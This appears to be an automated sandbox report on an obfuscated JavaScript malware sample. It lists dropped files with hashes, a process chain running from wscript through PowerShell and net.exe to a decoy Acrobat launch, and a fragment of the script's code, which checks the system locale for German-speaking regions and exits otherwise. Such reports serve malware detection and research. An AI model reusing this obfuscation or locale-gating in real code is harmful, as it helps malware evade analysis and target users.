Size (bytes): | 1090 |
Entropy (8bit): | 5.66978684707729 |
Encrypted: | false |
SSDEEP: | 24:Yv6XXpzvBamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSGc:YveVBgkDMUJUAh8cvMGc |
MD5: | 93F9BE5089FF78EC463C06C6037D5585 |
SHA1: | 2AFB817905F8678382C4531909F718092C62B0A8 |
SHA-256: | B18DDEBD356C73A0A993DCAB17A999EAD6AEE2D0309BCBA0FD8631C564626CF2 |
SHA-512: | 61153E4FA7EB88D2011F42A9B270113AB9AA9A684907937B150251048BC7A5F2AC8D7B7193B2D4BFDD5F70CE194C51012C7849987A7E2F7C51F49C669893CE93 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.2765506071069135 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJfshHHrPeUkwRe9:YvXKXE2tVu2Zc0vEGUUUkee9 |
MD5: | A9852DEE16192B41E4F2731F75403C8D |
SHA1: | 92730EB20C31B11D684975BC51A96824724B502B |
SHA-256: | 687DA9337CCACB23E44F4DEF4E810A036D282C51ED267C51E1D3040108AB3DAF |
SHA-512: | 36A5FF52F031E0184E021AC57626A4FBADC1214940A1638F3FA7B330964C86DE8FB7D18F73B78B0FE32258427517E1682D7BB34CAC6394EBDEEF941075A0DD5E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.291656436518101 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXE2tVuYKHVoZcg1vRcR0Y9KoAvJTqgFCrPeUkwRe9:YvXKXE2tVu2Zc0vEGTq16Ukee9 |
MD5: | 58BB24255A9FB95FBB602590473D9C7F |
SHA1: | 8C613B95C45DFC38CE24089EE5BFD0909FA7D27F |
SHA-256: | F343A0A14113C4950330F5E14936E2766CD7BC95DCFE34E2DE605D5501AD8ADE |
SHA-512: | CB8F5153576D8DA9360F92562DC5B9B4498308DA3E51640C14E8C956301A09407BE6371483217181862D37F909F9DBE56A09A3E310033961BAEC4C5E0CB1ACC7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.135808776001512 |
Encrypted: | false |
SSDEEP: | 48:YzB0nZ3yXrhF9kh7mONdoYXaRc+Zm4A+MzfQg/Hcq9rejoDC:yaZ3yXrhF9kh7z7oYXaJ0+MzfR/5rGou |
MD5: | AAC85536C429AFD80DBBB2D86291EC45 |
SHA1: | C558734433182DDD9F8D4628ED7C3E9269FC6369 |
SHA-256: | FC1F659817CD80FD16D592002174E9A0FC06292DC5A8FE6453EA8EE301FC7D5E |
SHA-512: | A4F0CDFC65419BD46E62196EDED035745729792780979F73F4BE29D4837D974C972C3743FEA12767FB1CA1BF5BD543B01A306F19D1220C53D23578080D857E35 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1890389992907746 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msEHUUUUUUUUFgGsSvR9H9vxFGiDIAEkGVvp5gGS:lNVmswUUUUUUUUFgGs+FGSItFgGS |
MD5: | 948184204C76BC0348F8EC1CE08D9187 |
SHA1: | 5E78E65838B04D529276DFC700ABEF13887BACC3 |
SHA-256: | 412095FE40C7E961BE9665EB107E1671FBBAB37D7EE6D3F91822140ACA8B7593 |
SHA-512: | 6109164B856650D6B70C9931D61FCDA568AEBF3623AA0D50E3842CF9FCDA8D4F0198F5E7533E40E4661BFC30BE4F0E590A6D0C30C6ED77DD41029E048D0EB25D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.608241104607601 |
Encrypted: | false |
SSDEEP: | 48:7MvbKUUUUUUUUUUFgG+vR9H9vxFGiDIAEkGVvYqFl2GL7msv:75UUUUUUUUUUFgGCFGSItKKVmsv |
MD5: | 3602CC226D433F12A4D26DE0C9355C36 |
SHA1: | 235BE48BDC2928A850848A8F670CCE6CB347A185 |
SHA-256: | 7184386E24DF0AF472A8528CBBD83F479CDC3623E51BD948F142410AE4702260 |
SHA-512: | FFF91247715178B297D94125B8CEDCBAB02467A5EB689348225B424DBDCE642B7CEEE63880446624726829BE663177C174F682CFB873EFCFF139E463FD9EA247 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgobrPzB7mTYZGk55yegKlNNCbYyu:6a6TZ44ADEobrbB7mTBcNkbK |
MD5: | 98BD223ECFB7451E016CB288F580E1D4 |
SHA1: | 24702C38E0E58FA34C282B7F3E8822BD8A2479FA |
SHA-256: | 635138406465F3C0E1DA93C70BD50C708439F373C34E4F46C1BF57CA255E9E8E |
SHA-512: | 97A6E23726BCA95597F14FDF0EE28574E806C01EA690B9E48290341F75896EEB2366B2B632225D3B22261CFBD63DFD057F5226291822433F263A45DC55080533 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulDsU/lL:NllUw0l |
MD5: | 40AD2DADD7C6A77A6CBDE5057E88E60A |
SHA1: | CF25D4A536DA991F8D656DAAFB7D6A26239264EA |
SHA-256: | 8A1847256A0D388487F911FCE41E80E711DFF9CDCF09A7A3BB7465FB13867A66 |
SHA-512: | 3EEA710C6BAD9A37B60902DC731F37B72E22C98CEBE95C56F8A0A88FD1A5C479D46953D2547F55F26438C1ABC164E3FF8849CA8B385F1B699CB156846CE146C3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.503482856767026 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClElSYH:Qw946cPbiOxDlbYnuRK+boYH |
MD5: | 2C891CF2D9ED0E86DAAA5DD593749D0E |
SHA1: | FD7D7FA7D20DBA62250BEB1FB7AA8222634DE519 |
SHA-256: | 448CA5056B206CD090061B60989B65EE1959C059AB18839015564CC5036D173F |
SHA-512: | 0CBBB374CDEE0EC171B75EED22215FDFBEE4ACED315E21424045FCA6E48EA681374FF4B34CF4180C0C3584434AEBE04E311E294A31F52CAD3455491CC1DA8083 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 20-09-33-902.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.345946398610936 |
Encrypted: | false |
SSDEEP: | 384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW |
MD5: | 8947C10F5AB6CFFFAE64BCA79B5A0BE3 |
SHA1: | 70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778 |
SHA-256: | 4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485 |
SHA-512: | B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.358434659135791 |
Encrypted: | false |
SSDEEP: | 384:/tSPAPrPY+G+t+T2+V+I+q+F+P+uk59kPLLLQLnLVLBrQr0rXrurXwCgCsCO2y2t:/QozwVcQ2QPXSAdw9YfUDBFUAzy077pa |
MD5: | FA2DE2168F9F6F12ED9D595DB16D8C64 |
SHA1: | 9B6A73A219AAB4DC72BBD2B6EEFF14931FCFD362 |
SHA-256: | D4351C4268C1B0E80BEB72C5FE63620AD176881669A72BC0A1D572EABBBCACB1 |
SHA-512: | D1E92969001323AB9B87DB9215EAC1A109A77E0BD7FD541A9A07F075F096D1529A1777EB7261B9700DCAD9AC7B157837D40D178DA157A07ED2AFA0A7E2697112 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.392388849742351 |
Encrypted: | false |
SSDEEP: | 768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rj:Ca |
MD5: | A236BB886713B36CEA64841671EBE558 |
SHA1: | 3B6AB579ADF005C62C1F16DF4FFD2A38CD5F891A |
SHA-256: | 045AB5115D778B593AAC69DD0E2490756881D1291C482C5F6B49E0B8FA4088FE |
SHA-512: | D4CA5D211B776284A2BB087607CA102482CA4D453C51A3C593F183C7F1735C3993497345104FE1B5FAFF9D0E8637143C73CBDE5420844717CBE7BC57D5AEA0DA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/nZwYIGNPgeWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:fZwZG/WLxYGZN3mlind9i4ufFXpAXkru |
MD5: | 1F3D69524A9D7E17BD2363C81D130F1A |
SHA1: | C2A4A08839CBA47BEE2B601975F7C4F0CC191091 |
SHA-256: | D0FFBEC8502A0BE88A99F6708987658FEBE4CF3B6B79AF219C53EFF6458F9D9D |
SHA-512: | A4CBE7073A7CB4C5E33E1CD903CCD7F24B78A04C037BFA1D90D9A5BBD12AF60E3DFFD6546277D1B765CA1DAC1CDA28D24D3454C81952B72D97CAF84DF395E99A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.915641205000071 |
TrID: | |
File name: | 1627923942308705884.js |
File size: | 18'418 bytes |
MD5: | b167e12e38f091be105329e83b164724 |
SHA1: | 778e3ed8b7ec94b6bc4c9cb851f1ff49610effb4 |
SHA256: | 141a72b03c1c37d80060693dad4918d24722f3d1930a2ac9e14bffdd40cad7f9 |
SHA512: | 438f3780da245fe6a7709b8039f4f6dc098af58ca382cc2f4650fe1b2de7cafc2866f5c444ee4214cef5ff72ea751a3fe47a4a7345ec81dc04bba81c975609f1 |
SSDEEP: | 384:yygg2ffwQffwxJ69ph9DNydNOxH+HIH+HYHfHAHTHPHSHYH/HoHZHoHHHAHhHjH3:rtpL8vMOB464qviL/0qPa5aniR7W/+NR |
TLSH: | 2E8252D6A68C9C1BCFCDDC92A1D705E2098CCA5844B410AF998F14E519BC7721BF6B3D |
File Content Preview: | function szntteouy(){uqndpt=[1031,3079,5127,4103,2055,3072];var lsphuflex=this[ekjudvxr+tremc+zwdjdnitk+igsnn+wptasoqh+gijmu+vlove+gbocxqaqk](this[chpydvsbt+fjnoleg+wvrmwqslt+zwdjdnitk+auyyrkaud+ekjudvxr+gbocxqaqk][efdkdsv+zwdjdnitk+wptasoqh+tremc+gbocxqa |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 20:09:21 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6129e0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 20:09:22 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4240000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 20:09:22 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 20:09:22 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 20:09:30 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6bc1b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 20:09:30 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4240000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 20:09:30 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6891b0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 20:09:31 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 20:09:31 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eef20000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | false |
Target ID: | 9 |
Start time: | 20:09:31 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function szntteouy() { |
|
1 | uqndpt = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var lsphuflex = this[ekjudvxr + tremc + zwdjdnitk + igsnn + wptasoqh + gijmu + vlove + gbocxqaqk] ( this[chpydvsbt + fjnoleg + wvrmwqslt + zwdjdnitk + auyyrkaud + ekjudvxr + gbocxqaqk][efdkdsv + zwdjdnitk + wptasoqh + tremc + gbocxqaqk + wptasoqh + pmxmp + edwjsj + exyckpsar + wptasoqh + wvrmwqslt + gbocxqaqk] ( chpydvsbt + fjnoleg + wvrmwqslt + zwdjdnitk + auyyrkaud + ekjudvxr + gbocxqaqk + fhguud + fjnoleg + lahogvwpe + wptasoqh + beqmlba + beqmlba ) [nyyboqeiq + wptasoqh + uvolij + nyyboqeiq + wptasoqh + tremc + ihumu] ( ffzxz + mfmcer + qdgioaui + tgpemqw + lkujbd + efdkdsv + jrxfqife + nyyboqeiq + nyyboqeiq + qdgioaui + wjvpx + ogaboahd + lkujbd + jrxfqife + fjnoleg + qdgioaui + nyyboqeiq + qapfjle + efdkdsv + jgcwkxwti + vlove + gbocxqaqk + zwdjdnitk + jgcwkxwti + beqmlba + hnwafsgxt + szyia + tremc + vlove + wptasoqh + beqmlba + qapfjle + gijmu + vlove + gbocxqaqk + wptasoqh + zwdjdnitk + vlove + tremc + gbocxqaqk + auyyrkaud + jgcwkxwti + vlove + tremc + beqmlba + qapfjle + mjstrcbg + jgcwkxwti + wvrmwqslt + tremc + beqmlba + wptasoqh ), 16 ); |
|
3 | for ( bgspkm = 0 ; bgspkm < uqndpt[beqmlba + wptasoqh + vlove + uvolij + gbocxqaqk + lahogvwpe] ; ++ bgspkm ) | |
4 | { | |
5 | if ( lsphuflex == uqndpt[bgspkm] ) | |
6 | { | |
7 | lsphuflex = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( lsphuflex !== true ) | |
12 | this[chpydvsbt + fjnoleg + wvrmwqslt + zwdjdnitk + auyyrkaud + ekjudvxr + gbocxqaqk][wivuj + eseqlex + auyyrkaud + gbocxqaqk] ( ); | |
